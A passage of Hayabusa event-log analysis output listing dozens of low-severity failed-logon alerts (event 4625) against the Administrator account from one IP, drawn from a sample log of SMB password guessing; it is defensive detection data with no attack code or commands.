NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
